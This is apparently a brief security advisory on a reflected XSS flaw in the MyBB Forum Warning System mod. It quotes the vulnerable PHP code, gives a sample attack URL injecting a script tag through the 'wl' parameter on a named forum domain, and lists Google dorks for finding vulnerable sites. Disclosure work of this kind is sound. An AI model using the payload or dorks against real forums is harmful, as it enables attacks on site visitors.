SecurityvulnsSECURITYVULNS:DOC:21379MyBB (FWS Mod) reflected XSS
MyBB (FWS Mod) reflected XSS
Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814)
Vulnerable piece of code:
//USERCP AND PM CHANGES
elseif($file == "usercp.php" || $file == "private.php")
{
if(function_exists("imagecreatefrompng") && $mybb->user['fws_warnings'] != 0)
{
if($mybb->user['fws_warnings'] <= 14 && $mybb->user['fws_warnings'] > 0) $addition = " ".fws_warning_colour($mybb->user['fws_warnings']."%");
$fws_current_w_level = '<img src="fws.php?action=image&wl='.$mybb->user['fws_warnings'].'" alt="'.$mybb->user['fws_warnings'].'%" title="'.$mybb->user['fws_warnings'].'%" border="0" />'.$addition;
}
Example: http://mybboard.it/forum/fws.php?action=image&wl=/\<sCRIPT>alert("xss")</sCRIPT>\
Google dork: inurl:fws.php
"MyBB" inurl:fws.php